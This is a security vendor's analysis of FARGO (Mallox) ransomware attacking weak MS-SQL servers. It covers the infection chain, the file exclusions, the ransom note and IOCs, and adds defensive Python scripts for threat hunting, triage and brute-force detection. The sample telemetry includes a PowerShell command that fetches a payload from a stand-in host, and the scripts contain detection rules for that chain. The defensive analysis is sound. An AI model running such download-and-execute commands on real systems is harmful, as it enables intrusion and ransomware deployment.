
FARGO Ransomware (Mallox) Being Distributed to Vulnerable MS-SQL Servers

The ASEC analysis team constantly monitors malware distributed to vulnerable MS-SQL servers, and has recently discovered FARGO ransomware being distributed to them. Together with GlobeImposter, FARGO is one of the most prominent ransomware families targeting vulnerable MS-SQL servers. It was formerly known as Mallox, after the .mallox extension it appended to encrypted files.

– [ASEC Blog] Cobalt Strike Being Distributed to Vulnerable MS-SQL Servers
– [ASEC Blog] Cobalt Strike Being Distributed to Vulnerable MS-SQL Servers (2)
– [ASEC Blog] Coin Miner Being Distributed to Vulnerable MS-SQL Servers
– [ASEC Blog] AsyncRAT Malware Being Distributed to Vulnerable MS-SQL Servers

Figure 1. Process tree

As the process tree in Figure 1 shows, the MS-SQL process launches cmd.exe and powershell.exe, which download a file built on .NET (see Figure 2). That file in turn downloads and loads additional malware from a specific address. The loaded malware then creates a BAT file in the %temp% directory and executes it; the BAT file terminates certain processes and services (see Figures 3 and 4).

Figure 2. Download of additional files
Figure 3. Creation and execution of BAT file
Figure 4. Details of BAT file
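The delivery chain above (the SQL service launching cmd.exe and PowerShell, a downloaded binary running from a temp directory, and a BAT file executed from %temp%) is something a practitioner can hunt for in process-creation telemetry. The following is an added example, not code from the ASEC post: it runs three simple rules over constructed events shaped like Sysmon Event ID 1 records. The field names, file names (stage1.exe, kill.bat), paths and the 192.0.2.10 address are assumptions for illustration only.

```python
"""Hunt for the delivery chain in process-creation telemetry (added example,
not ASEC's code). Events are constructed to resemble Sysmon Event ID 1
records; the field names (pid, ppid, image, parent_image, command_line) and
all file names, paths and addresses are assumptions for illustration."""
import ntpath

SQL_IMAGES = {"sqlservr.exe"}                        # MS-SQL service binary
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}

SQL_BIN = (r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER"
           r"\MSSQL\Binn\sqlservr.exe")
PS_BIN = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD_BIN = r"C:\Windows\System32\cmd.exe"

# Constructed telemetry, not real logs. The first two events are benign.
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 700, "image": SQL_BIN,
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": '"sqlservr.exe" -sMSSQLSERVER'},
    {"pid": 2100, "ppid": 1900, "image": CMD_BIN,
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": '"C:\\Windows\\System32\\cmd.exe"'},
    # The SQL service spawns cmd.exe, which runs PowerShell to fetch a file...
    {"pid": 3300, "ppid": 1200, "image": CMD_BIN, "parent_image": SQL_BIN,
     "command_line": 'cmd.exe /c powershell -nop -w hidden -c "iwr '
                     'http://192.0.2.10:8080/a.png -OutFile C:\\Windows\\Temp\\stage1.exe"'},
    {"pid": 3310, "ppid": 3300, "image": PS_BIN, "parent_image": CMD_BIN,
     "command_line": 'powershell -nop -w hidden -c "iwr '
                     'http://192.0.2.10:8080/a.png -OutFile C:\\Windows\\Temp\\stage1.exe"'},
    # ...the downloaded .NET file runs (hypothetical name stage1.exe)...
    {"pid": 3400, "ppid": 3310, "image": r"C:\Windows\Temp\stage1.exe",
     "parent_image": PS_BIN, "command_line": r"C:\Windows\Temp\stage1.exe"},
    # ...and executes a BAT file from the temp directory (hypothetical name).
    {"pid": 3410, "ppid": 3400, "image": CMD_BIN,
     "parent_image": r"C:\Windows\Temp\stage1.exe",
     "command_line": r'cmd.exe /c "C:\Windows\Temp\kill.bat"'},
]


def _base(path):
    return ntpath.basename(path).lower()


def lineage_has(events_by_pid, pid, names):
    """True if any ancestor of pid (following ppid links) has an image in names.
    Caveat: pid reuse is ignored; on a busy host key by pid plus start time."""
    seen = set()
    cur = events_by_pid.get(pid)
    while cur is not None and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        parent = events_by_pid.get(cur["ppid"])
        if parent is None:
            return False
        if _base(parent["image"]) in names:
            return True
        cur = parent
    return False


def hunt(events):
    """Return (pid, rule) findings in event order."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img, parent = _base(e["image"]), _base(e["parent_image"])
        cmd = e["command_line"].lower()
        # 1. The database engine has no business starting a shell.
        if parent in SQL_IMAGES and img in SHELL_IMAGES:
            findings.append((e["pid"], "sql_service_spawned_shell"))
        # 2. Anything running from a temp directory in the SQL service's lineage.
        if "\\temp\\" in e["image"].lower() and lineage_has(by_pid, e["pid"], SQL_IMAGES):
            findings.append((e["pid"], "temp_binary_in_sql_lineage"))
        # 3. cmd.exe executing a .bat dropped in a temp directory.
        if img == "cmd.exe" and ".bat" in cmd and "\\temp\\" in cmd:
            findings.append((e["pid"], "bat_from_temp"))
    return findings


if __name__ == "__main__":
    for pid, rule in hunt(SAMPLE_EVENTS):
        print(pid, rule)
```

Rule 1 alone catches the first step of this chain regardless of what is downloaded later; rules 2 and 3 add the temp-directory stages so that the finding survives a change of downloader or BAT file name. The benign cmd.exe started from Explorer produces no finding.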

The ransomware proper runs injected into AppLaunch.exe, a legitimate Windows program. It attempts to delete a registry key under a specific path (see Figure 5), runs a command that disables recovery, and terminates certain processes (see Figure 6). As the figures show, the terminated processes belong to SQL software, a common step that releases database files held open by the server so they can be encrypted.

Figure 5. Registry deletion
Figure 6. Deactivation of recovery and closing of processes

When the ransomware encrypts files, it skips the file extensions listed in Table 1. Notably, it does not encrypt files bearing extensions associated with GlobeImposter, and the exclusion list covers not only its own .FARGO, .FARGO2 and .FARGO3 extensions but also .FARGO4, which is presumably reserved for a future version of the ransomware.

Table 1. Extensions excluded from infection
Table 2. Files excluded from infection
Table 3. Paths excluded from infection

Figure 7 shows the ransom note, with an infected file visible at the top right of the same screen. As the figure shows, an encrypted file is renamed to OriginalFileName.FileExtension.Fargo3, and the ransom note is written with the file name 'RECOVERY FILES.txt'.

Figure 7. Ransom note and infected file
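The naming scheme above (OriginalFileName.FileExtension.Fargo3 plus a 'RECOVERY FILES.txt' note per directory) is enough to scope an infection during incident response. The script below is an added example, not from the ASEC post: it walks a directory tree, recovers the original file name from each encrypted name, and counts notes and variants. Accepting the .FARGO, .FARGO2 and .FARGO4 spellings from the sample's own exclusion list, and matching case-insensitively, are this example's assumptions; the directory layout it builds is constructed for the demonstration.

```python
"""Triage a directory tree for FARGO artifacts (added example, not from the
ASEC post). Looks for files renamed OriginalFileName.FileExtension.Fargo3
and for 'RECOVERY FILES.txt' notes, as described above. Also accepting the
.FARGO/.FARGO2/.FARGO4 spellings from the sample's own exclusion list, and
matching case-insensitively, are this example's assumptions."""
import os
import re
import tempfile

RANSOM_NOTE = "RECOVERY FILES.txt"
# '.Fargo', '.Fargo2', '.FARGO3' ... only at the very end of the name.
FARGO_SUFFIX = re.compile(r"\.fargo\d*$", re.IGNORECASE)


def split_encrypted_name(name):
    """Return (original_name, variant) for an encrypted name, else None.
    'q3.xlsx.Fargo3' -> ('q3.xlsx', 'FARGO3'); a bare '.Fargo3' has no
    original name and is not treated as encrypted."""
    m = FARGO_SUFFIX.search(name)
    if not m or m.start() == 0:
        return None
    return name[:m.start()], m.group(0)[1:].upper()


def triage(root):
    """Walk root and collect encrypted files and ransom notes."""
    encrypted, notes = [], []
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            full = os.path.join(dirpath, f)
            if f == RANSOM_NOTE:
                notes.append(full)
                continue
            parsed = split_encrypted_name(f)
            if parsed:
                original, variant = parsed
                encrypted.append({"path": full, "original": original, "variant": variant})
    return {"encrypted": encrypted, "notes": notes}


def summarize(result):
    """Counts per variant, affected directories and recovered original names."""
    variants = {}
    for e in result["encrypted"]:
        variants[e["variant"]] = variants.get(e["variant"], 0) + 1
    return {"encrypted": len(result["encrypted"]),
            "variants": variants,
            "note_dirs": sorted({os.path.dirname(n) for n in result["notes"]}),
            "originals": sorted(e["original"] for e in result["encrypted"])}


def build_sample_tree(root):
    """Constructed layout (not real victim data)."""
    layout = {
        "finance/q3.xlsx.Fargo3": b"\x00" * 16,
        "finance/RECOVERY FILES.txt": b"constructed ransom note",
        "db/backup.bak.FARGO": b"\x00" * 16,
        "db/notes.txt": b"untouched",
        "web/index.html.Fargo2": b"\x00" * 16,
        "web/RECOVERY FILES.txt": b"constructed ransom note",
        "web/style.css": b"body{}",
        "web/archive.Fargo3.bak": b"not encrypted: the suffix is not last",
    }
    for rel, data in layout.items():
        p = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as fh:
            fh.write(data)


def demo():
    """Build the sample tree in a fresh temp dir and return its summary."""
    root = tempfile.mkdtemp(prefix="fargo_triage_")
    build_sample_tree(root)
    return summarize(triage(root))


if __name__ == "__main__":
    print(demo())
```

Point triage() at a mounted copy of an affected share rather than the live system, and treat the list of original names as the restore list for backups; the note directories show how far the encryption walk reached.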

Typical attacks against database servers (MS-SQL and MySQL) are brute-force and dictionary attacks on systems whose account credentials are poorly managed, and exploitation of known vulnerabilities on systems that have not been patched.

Administrators of MS-SQL servers should use passwords that are hard to guess and change them periodically to protect the database server from brute-force and dictionary attacks, and apply the latest patches to prevent exploitation of known vulnerabilities.
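Strong passwords reduce the chance that a brute-force or dictionary attack succeeds, but the attempts themselves are visible in the SQL Server error log as "Login failed for user" entries with a [CLIENT: ...] address. The detector below is an added example, not from the ASEC post: it parses such lines and raises an alert when one client exceeds a failure threshold within a sliding window. The log excerpt is constructed, the 203.0.113.45 and 10.0.0.5 addresses are documentation ranges, and the threshold and window values are assumptions to tune per environment.

```python
"""Flag brute-force and dictionary attempts in a SQL Server error log (added
example, not from the ASEC post). Parses 'Login failed for user' lines and
alerts when a client exceeds THRESHOLD failures within WINDOW. The log
excerpt is constructed; threshold and window are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failures(lines):
    """Yield (timestamp, user, client) for each failed-login line."""
    for line in lines:
        m = LOGIN_FAILED.match(line)
        if m:
            yield (datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                   m["user"], m["client"])


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """One alert per client the first time it reaches threshold failures
    inside the window; the alert lists every user name tried so far, which
    separates a dictionary attack on 'sa' from a spray across accounts."""
    recent = defaultdict(deque)     # client -> failure timestamps in window
    users = defaultdict(set)
    alerted, alerts = set(), []
    for ts, user, client in parse_failures(lines):
        q = recent[client]
        q.append(ts)
        users[client].add(user)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and client not in alerted:
            alerted.add(client)
            alerts.append({"client": client, "failures": len(q),
                           "users": sorted(users[client]), "at": ts})
    return alerts


def sample_log():
    """Constructed error-log excerpt, not from a real server: six failures
    from one client in 25 seconds, plus one unrelated typo from an app host."""
    base = datetime(2022, 9, 14, 3, 12, 40)
    lines = ["2022-09-14 03:12:39.00 spid10s     Server is listening on [ 'any' <ipv4> 1433]."]
    for i in range(6):
        t = (base + timedelta(seconds=5 * i)).strftime("%Y-%m-%d %H:%M:%S.%f")[:-4]
        user = "admin" if i == 2 else "sa"
        lines.append(f"{t} Logon       Error: 18456, Severity: 14, State: 8.")
        lines.append(f"{t} Logon       Login failed for user '{user}'. Reason: Password "
                     f"did not match that for the login provided. [CLIENT: 203.0.113.45]")
    lines.append("2022-09-14 03:13:30.00 Logon       Login failed for user 'appuser'. Reason: "
                 "Password did not match that for the login provided. [CLIENT: 10.0.0.5]")
    return lines


if __name__ == "__main__":
    for a in detect_bruteforce(sample_log()):
        print(a)
```

On a server exposed to the Internet the client addresses will mostly be unfamiliar, which is itself the finding: an MS-SQL instance that accepts logins from arbitrary addresses should be placed behind a firewall or VPN in addition to the password and patching advice above.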

AhnLab’s anti-malware software, V3, detects and blocks the malware using the following aliases:

[File Detection]
– Ransomware/Win.Ransom.C5153317(2022.06.02.01)
– Dropper/Win.DotNet.C5237010(2022.09.14.03)
– Downloader/Win.Agent.R519342(2022.09.15.03)
– Trojan/BAT.Disabler (2022.09.16.00)

[Behavior Detection]
– Malware/MDP.Download.M1197

[IOC]
MD5

– b4fde4fb829dd69940a0368f44fca285
– c54daefe372efa4ee4b205502141d360
– 4d54af1bbf7357964db5d5be67523a7c
– 41bcad545aaf08d4617c7241fe36267c

Download
– hxxp://49.235.255[.]219:8080/Pruloh_Matsifkq.png

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post FARGO Ransomware (Mallox) Being Distributed to Vulnerable MS-SQL Servers appeared first on ASEC BLOG.

Article Link: FARGO Ransomware (Mallox) Being Distributed to Vulnerable MS-SQL Servers – ASEC BLOG
